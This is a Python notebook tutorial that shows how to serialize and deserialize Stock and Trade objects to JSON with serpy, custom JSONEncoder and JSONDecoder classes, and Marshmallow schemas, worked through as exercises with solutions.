In [1]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [2]:
import serpy

Very similarly to `Marshmallow` we need to define a schema for the serialization - Serpy calls those objects serializers:

In [3]:
class PersonSerializer(serpy.Serializer):
    name = serpy.StrField()
    age = serpy.IntField()

In [4]:
p1 = Person('Michael Palin', 75)

In [5]:
PersonSerializer(p1).data

{'name': 'Michael Palin', 'age': 75}

Of course, we can get more complex schemas defined.

Let's implement a schema for our `Movie` example we did in a previous video on Marshmallow.

In [6]:
class Movie:
    def __init__(self, title, year, actors):
        self.title = title
        self.year = year
        self.actors = actors

In [7]:
class MovieSerializer(serpy.Serializer):
    title = serpy.StrField()
    year = serpy.IntField()
    actors = PersonSerializer(many=True)

In [8]:
p2 = Person('John Cleese', 79)

In [9]:
movie = Movie('Parrot Sketch', 1989, [p1, p2])

In [10]:
movie.title, movie.year, movie.actors

('Parrot Sketch',
 1989,
 [Person(name=Michael Palin, age=75), Person(name=John Cleese, age=79)])

In [11]:
MovieSerializer(movie).data

{'title': 'Parrot Sketch',
 'year': 1989,
 'actors': [{'name': 'Michael Palin', 'age': 75},
  {'name': 'John Cleese', 'age': 79}]}

Note that the result of serialization is a basic Python dictionary, and you can take this further to JSON or YAML using the standard library `json` module or `PyYAML`.

For example:

In [12]:
import json
import yaml

In [13]:
json.dumps(MovieSerializer(movie).data)

'{"title": "Parrot Sketch", "year": 1989, "actors": [{"name": "Michael Palin", "age": 75}, {"name": "John Cleese", "age": 79}]}'

In [14]:
print(yaml.dump(MovieSerializer(movie).data, 
          default_flow_style=False))

actors:
- age: 75
  name: Michael Palin
- age: 79
  name: John Cleese
title: Parrot Sketch
year: 1989



# Section 08 - Coding Exercises

##  Coding Exercises

Consider the following classes:

In [1]:
class Stock:
    def __init__(self, symbol, date, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume

#### Exercise 1

Given the above classes, write a custom `JSONEncoder` class to **serialize** dictionaries that contain instances of these particular classes. Keep in mind that you will want to deserialize the data too - so you will need some technique to indicate the object type in your serialization.

For example you may have an object such as this one that needs to be serialized:

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

Hint: You can modify the classes if you need to.

#### Exercise 2

Write code to reverse the serialization you just created. Write a custom decoder that can deserialize a JSON structure containing `Stock` and `Trade` objects. 

#### Exercise 3

Do the same serialization and deserialization, but using `Marshmallow`.

##  Exercise 1 - Solution

The first thing I am going to do is add an `as_dict` method to both my classes to make serialization a bit easier:

In [1]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

My approach is going to be to serialize these classes using a special class name identifier.

For example to serialize `Stock` objects I will use this format:

```
{
    "object": "Stock",
    "symbol": "...",
    ...
}
```

Similarly for `Trade` objects.

Furthermore, I need to pay special attention to dates, timestamps and prices.

For dates and timestamps I will use the standard ISO format (`YYYY-MM-DD` and `YYYY-MM-DDTHH:MM:SS`).

Prices are stored in `Decimal` objects - so we'll have to handle serialization for those objects too.
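
As a quick check of those formats, the sketch below uses only the standard library. `isoformat()` produces the same strings as the `strftime` patterns used in this solution (for a `datetime` with no microseconds and no timezone), and `str()` on a `Decimal` keeps trailing zeros. The `fromisoformat` round trip assumes Python 3.7 or later.

```python
from datetime import date, datetime
from decimal import Decimal

d = date(2018, 11, 22)
dt = datetime(2018, 11, 22, 10, 5, 12)
price = Decimal('337.60')

# strftime patterns and isoformat() agree for these values
date_str = d.strftime('%Y-%m-%d')
datetime_str = dt.strftime('%Y-%m-%dT%H:%M:%S')
same_date_format = date_str == d.isoformat()
same_datetime_format = datetime_str == dt.isoformat()

# str() keeps the trailing zero; converting through float would not
price_str = str(price)
price_via_float = str(float(price))

# Round trips back to the original objects (fromisoformat needs Python 3.7+)
date_round_trip = date.fromisoformat(date_str)
datetime_round_trip = datetime.fromisoformat(datetime_str)
price_round_trip = Decimal(price_str)
```

Serializing prices as strings, rather than as JSON numbers, is what lets us get the exact same `Decimal` back later.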

In [3]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock):
            return obj.as_dict()
        elif isinstance(obj, Trade):
            return obj.as_dict()
        else:
            return super().default(obj)

This will not work quite yet - we are not handling decimal, date and datetime serialization:

In [4]:
dumps(activity, cls=CustomEncoder)

TypeError: Object of type 'date' is not JSON serializable

There are a few ways we can fix that - we could serialize by coding the date formatting directly in the `Trade` or `Stock` serializers:

In [5]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock):
            result = obj.as_dict()
            result['date'] = result['date'].strftime('%Y-%m-%d')
            return result
        elif isinstance(obj, Trade):
            result = obj.as_dict()
            result['timestamp'] = result['timestamp'].strftime('%Y-%m-%dT%H:%M:%S')
            return result
        else:
            return super().default(obj)

This will still not quite work because we are not handling serialization of `Decimal` objects. But I would rather not have to handle them the way we are handling `date` and `datetime` objects - that would be very tedious.

In fact, I am going to write handlers for the `Decimal` as well as `date` and `datetime` classes this way:

In [6]:
from json import JSONEncoder, dumps

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            return obj.as_dict()
        elif isinstance(obj, datetime):
            # check for datetime first, because a datetime is also a date
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            return super().default(obj)
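
The order of the `isinstance` checks matters here. As a minimal illustration using only the standard library: `datetime` is a subclass of `date`, so a `date` check placed first would also match timestamps and drop the time portion.

```python
from datetime import date, datetime

ts = datetime(2018, 11, 22, 10, 5, 12)

# datetime inherits from date, so both checks succeed for a datetime
is_subclass = issubclass(datetime, date)
matches_date = isinstance(ts, date)

# What would happen if the date branch ran first: the time is lost
wrong = ts.strftime('%Y-%m-%d')
right = ts.strftime('%Y-%m-%dT%H:%M:%S')

# A plain date is not a datetime, so the datetime branch never catches it
plain_is_datetime = isinstance(date(2018, 11, 22), datetime)
```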

In [7]:
encoded = dumps(activity, cls=CustomEncoder, indent=2)

In [8]:
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20,
      "commission": "9.99"
    }
  ]
}
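
The per-type handlers work because the encoder keeps calling `default` for any value it cannot serialize, including values nested inside the dictionary that `default` itself returned. The following sketch makes that visible with a hypothetical `Point` class and a `TracingEncoder` that records the types it is asked to handle; neither is part of the exercise.

```python
from decimal import Decimal
from json import JSONEncoder


class Point:
    # Hypothetical class, used only for this illustration
    def __init__(self, x, y):
        self.x = x
        self.y = y


class TracingEncoder(JSONEncoder):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.seen = []  # names of the types passed to default()

    def default(self, obj):
        self.seen.append(type(obj).__name__)
        if isinstance(obj, Point):
            # the returned dict still contains Decimal values
            return {'x': obj.x, 'y': obj.y}
        if isinstance(obj, Decimal):
            return str(obj)
        return super().default(obj)


encoder = TracingEncoder()
encoded_point = encoder.encode(Point(Decimal('1.5'), Decimal('2.25')))
```

After encoding, `encoder.seen` lists `Point` followed by two `Decimal` entries: the `Decimal` values inside the returned dictionary were passed back through `default`, which is why `as_dict` does not need to convert them itself.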


We're almost there - the serialization works just fine, but if I'm going to deserialize the objects later, I will need to know what the object type is for the `Trade` and `Stock` objects. We could add it to the `as_dict` methods of each class, but I don't necessarily want it all the time - so instead I am going to inject the class name during the serialization:

In [9]:
class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            result = obj.as_dict()
            result['object'] = obj.__class__.__name__
            return result
        elif isinstance(obj, datetime):
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            return super().default(obj)

In [10]:
result = dumps(activity, cls=CustomEncoder, indent=2)
print(result)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20,
      "commission": "9.99",
      "object": "Trade"
    }
  ]
}

##  Exercise 2 - Solution

Here's where we ended up after completing Exercise 1:

In [1]:
from json import JSONEncoder, dumps
from datetime import date, datetime
from decimal import Decimal

class CustomEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Stock) or isinstance(obj, Trade):
            result = obj.as_dict()
            result['object'] = obj.__class__.__name__
            return result
        elif isinstance(obj, datetime):
            return obj.strftime('%Y-%m-%dT%H:%M:%S')
        elif isinstance(obj, date):
            return obj.strftime('%Y-%m-%d')
        elif isinstance(obj, Decimal):
            return str(obj)
        else:
            return super().default(obj)

In [2]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)

In [3]:
activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

And we could serialize our objects:

In [4]:
encoded = dumps(activity, cls=CustomEncoder, indent=2)
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20,
      "commission": "9.99",
      "object": "Trade"
    }
  ]
}

Now we want to reverse the process and deserialize this JSON object. I am not going to assume any specific schema, other than that `Stock` and `Trade` objects will contain the `"object": "Stock"` or `"object": "Trade"` entry, along with the additional fields required to define those objects.

What I want to do is examine each dictionary, and if it contains those entries, I will want to deserialize as the corresponding objects.

We'll need to pay attention also to `date`, `datetime`, and `Decimal` type objects.

Let's start by writing a utility function that will convert a JSON dictionary of each specific type to the corresponding object type:

In [5]:
def decode_stock(d):
    # assumes "object": "Stock" is in the dictionary
    # and contains all the required serialized fields needed to re-create the object
    # if working in Python 3.7 or later, we could use date.fromisoformat(d['date']) instead
    s = Stock(d['symbol'], 
              datetime.strptime(d['date'], '%Y-%m-%d').date(), 
              Decimal(d['open']), 
              Decimal(d['high']), 
              Decimal(d['low']), 
              Decimal(d['close']),
              int(d['volume']))
    return s

Let's make sure this works:

In [6]:
s = decode_stock({
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    })

In [7]:
type(s), vars(s)

(__main__.Stock,
 {'symbol': 'AAPL',
  'date': datetime.date(2018, 11, 22),
  'open': Decimal('176.66'),
  'high': Decimal('177.25'),
  'low': Decimal('176.64'),
  'close': Decimal('176.78'),
  'volume': 3699184})

Now let's do the same thing with a `Trade`:

In [8]:
def decode_trade(d):
    # assumes "object": "Trade" is in the dictionary
    # and contains all the required serialized fields needed to re-create the object
    s = Trade(d['symbol'], 
              datetime.strptime(d['timestamp'], '%Y-%m-%dT%H:%M:%S'), 
              d['order'], 
              Decimal(d['price']), 
              int(d['volume']), 
              Decimal(d['commission']))
    return s

In [9]:
t = decode_trade({
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    })

In [10]:
type(t), vars(t)

(__main__.Trade,
 {'symbol': 'TSLA',
  'timestamp': datetime.datetime(2018, 11, 22, 10, 5, 12),
  'order': 'buy',
  'price': Decimal('338.25'),
  'commission': Decimal('9.99'),
  'volume': 100})

OK, these look good to go, so one last utility function that can take in **either** a `Stock` or `Trade` type JSON object, and decode accordingly:

In [11]:
def decode_financials(d):
    object_type = d.get('object', None)
    if object_type == 'Stock':
        return decode_stock(d)
    elif object_type == 'Trade':
        return decode_trade(d)
    return d  

In [12]:
decode_financials({
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    })

<__main__.Trade at 0x10c4dc1d0>

In [13]:
decode_financials({
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    })

<__main__.Stock at 0x10c4dc588>

So now let's write our custom JSON decoding class:

In [14]:
from json import JSONDecoder, loads

In [15]:
class CustomDecoder(JSONDecoder):
    def decode(self, arg):
        data = loads(arg)
        # now we have to recursively look for `Trade` and `Stock` objects
        return self.parse_financials(data)
 
    def parse_financials(self, obj):
        if isinstance(obj, dict):
            obj = decode_financials(obj)
            if isinstance(obj, dict):
                for key, value in obj.items():
                    obj[key] = self.parse_financials(value)
        elif isinstance(obj, list):
            for index, item in enumerate(obj):
                obj[index] = self.parse_financials(item)
        return obj
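
As an aside, the recursive walk in `parse_financials` can also be delegated to the standard library: `json.loads` accepts an `object_hook` callable that it calls with every decoded JSON object (dictionary), innermost objects first. The following is only a minimal sketch of that idea - the `Quote` class, the `decode_quote` function and the `payload` string are hypothetical stand-ins, not the classes used in this exercise:

```python
import json
from datetime import date, datetime
from decimal import Decimal

class Quote:
    # hypothetical stand-in for the Stock class, trimmed to three fields
    def __init__(self, symbol, date_, close):
        self.symbol = symbol
        self.date = date_
        self.close = close

def decode_quote(d):
    # json.loads calls this for every JSON object it decodes
    if d.get('object') == 'Quote':
        return Quote(d['symbol'],
                     datetime.strptime(d['date'], '%Y-%m-%d').date(),
                     Decimal(d['close']))
    return d  # leave any other dictionary untouched

payload = '''
{"quotes": [
    {"symbol": "TSLA", "date": "2018-11-22", "close": "338.19", "object": "Quote"},
    {"symbol": "AAPL", "date": "2018-11-22", "close": "176.78", "object": "Quote"}
 ],
 "source": {"name": "demo"}
}
'''

decoded_hook = json.loads(payload, object_hook=decode_quote)
print(type(decoded_hook['quotes'][0]).__name__, decoded_hook['source'])
```

The hook only ever sees dictionaries, so lists are handled by the `json` module itself and no explicit recursion is needed.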

Let's recall our serialized data first:

In [16]:
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20

In [17]:
decoded = loads(encoded, cls=CustomDecoder)

In [18]:
decoded

{'quotes': [<__main__.Stock at 0x10c4df550>,
  <__main__.Stock at 0x10c4b6400>,
  <__main__.Stock at 0x10c4b6be0>],
 'trades': [<__main__.Trade at 0x10c4b6e48>, <__main__.Trade at 0x10c4b6978>]}

How can we check if the two objects are "equal"? The problem is that we did not define equality for `Stock` and `Trade` objects, so we cannot compare two instances of the same class and expect equality even if they have the same data. We need to define that first!
Let's do that:

In [19]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
    
    def __eq__(self, other):
        return isinstance(other, Stock) and self.as_dict() == other.as_dict()
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)
    
    def __eq__(self, other):
        return isinstance(other, Trade) and self.as_dict() == other.as_dict()
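
To see why `__eq__` is needed here, a small sketch may help. The `PlainPoint` and `ValuePoint` classes below are hypothetical and exist only for this illustration. Without `__eq__`, two instances are equal only if they are the same object. One side effect to keep in mind: a class that defines `__eq__` without also defining `__hash__` becomes unhashable, so its instances can no longer be used as dictionary keys.

```python
class PlainPoint:
    # hypothetical class with no __eq__: equality falls back to identity
    def __init__(self, x, y):
        self.x = x
        self.y = y

class ValuePoint(PlainPoint):
    # same data, but equality is defined on the attribute values
    def __eq__(self, other):
        return isinstance(other, ValuePoint) and vars(self) == vars(other)

plain_equal = PlainPoint(1, 2) == PlainPoint(1, 2)
value_equal = ValuePoint(1, 2) == ValuePoint(1, 2)

try:
    hash(ValuePoint(1, 2))
    value_hashable = True
except TypeError:
    # defining __eq__ without __hash__ sets __hash__ to None
    value_hashable = False

print(plain_equal, value_equal, value_hashable)
```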

In [20]:
activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

In [21]:
encoded = dumps(activity, cls=CustomEncoder)

In [22]:
decoded = loads(encoded, cls=CustomDecoder)

In [23]:
decoded == activity

True

##  Exercise 3 - Solution

Here we want to use Marshmallow to do the serialization and deserialization that we did in Exercises 1 and 2.

In [1]:
class Stock:
    def __init__(self, symbol, date, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

I'm first going to define some schemas for trades and stocks:

In [3]:
from marshmallow import Schema, fields

In [4]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal()
    high = fields.Decimal()
    low = fields.Decimal()
    close = fields.Decimal()
    volume = fields.Integer()

Let's test this one out quickly:

In [5]:
StockSchema().dump(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607))

MarshalResult(data={'low': Decimal('337.60'), 'open': Decimal('338.19'), 'close': Decimal('338.19'), 'volume': 365607, 'symbol': 'TSLA', 'high': Decimal('338.64'), 'date': '2018-11-22'}, errors={})

That's great, but there's a slight issue - you'll notice that the marshalled data has `Decimal` objects for our prices. This is still going to be an issue if we try to serialize to JSON:

In [6]:
StockSchema().dumps(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607))

TypeError: Object of type 'Decimal' is not JSON serializable
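
This limitation comes from the standard library `json` module rather than from Marshmallow itself. A minimal sketch using only the standard library (the `price` value is just an example) shows the failure, and shows that converting the `Decimal` to a string first keeps the exact digits:

```python
import json
from decimal import Decimal

price = Decimal('338.19')

try:
    json.dumps({'open': price})
    decimal_serializable = True
except TypeError:
    # the json module has no built-in encoding for Decimal
    decimal_serializable = False

# converting to a string first keeps the exact decimal digits
as_text = json.dumps({'open': str(price)})

# round trip: the string converts back to an equal Decimal
restored = Decimal(json.loads(as_text)['open'])
print(decimal_serializable, as_text, restored == price)
```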

So let's fix that:

In [7]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()

In [8]:
StockSchema().dump(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607)).data

{'low': '337.60',
 'open': '338.19',
 'close': '338.19',
 'volume': 365607,
 'symbol': 'TSLA',
 'high': '338.64',
 'date': '2018-11-22'}

And now we can serialize to JSON:

In [9]:
StockSchema().dumps(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607)).data

'{"low": "337.60", "open": "338.19", "close": "338.19", "volume": 365607, "symbol": "TSLA", "high": "338.64", "date": "2018-11-22"}'

Let's now handle the `Trade` schema:

In [10]:
class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()

In [11]:
TradeSchema().dumps(Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99'))).data

'{"price": "338.25", "volume": 100, "symbol": "TSLA", "order": "buy", "commission": "9.99", "timestamp": "2018-11-22T10:05:12+00:00"}'

Now let's write a schema for our overall dictionary that contains a list of Trades and a list of Quotes:

In [12]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

And we can now serialize and deserialize:

In [13]:
result = ActivitySchema().dumps(activity, indent=2).data

In [14]:
type(result)

str

In [15]:
print(result)

{
  "trades": [
    {
      "price": "338.25",
      "volume": 100,
      "symbol": "TSLA",
      "order": "buy",
      "commission": "9.99",
      "timestamp": "2018-11-22T10:05:12+00:00"
    },
    {
      "price": "177.01",
      "volume": 20,
      "symbol": "AAPL",
      "order": "sell",
      "commission": "9.99",
      "timestamp": "2018-11-22T10:30:05+00:00"
    }
  ],
  "quotes": [
    {
      "low": "337.60",
      "open": "338.19",
      "close": "338.19",
      "volume": 365607,
      "symbol": "TSLA",
      "high": "338.64",
      "date": "2018-11-22"
    },
    {
      "low": "176.64",
      "open": "176.66",
      "close": "176.78",
      "volume": 3699184,
      "symbol": "AAPL",
      "high": "177.25",
      "date": "2018-11-22"
    },
    {
      "low": "103.07",
      "open": "103.25",
      "close": "103.11",
      "volume": 4493689,
      "symbol": "MSFT",
      "high": "103.48",
      "date": "2018-11-22"
    }
  ]
}


So a JSON string...
Let's deserialize that JSON string:

In [16]:
activity_deser = ActivitySchema().loads(result).data

In [17]:
type(activity_deser)

dict

In [18]:
from pprint import pprint

pprint(activity_deser)

{'quotes': [{'close': Decimal('338.19'),
             'date': datetime.date(2018, 11, 22),
             'high': Decimal('338.64'),
             'low': Decimal('337.60'),
             'open': Decimal('338.19'),
             'symbol': 'TSLA',
             'volume': 365607},
            {'close': Decimal('176.78'),
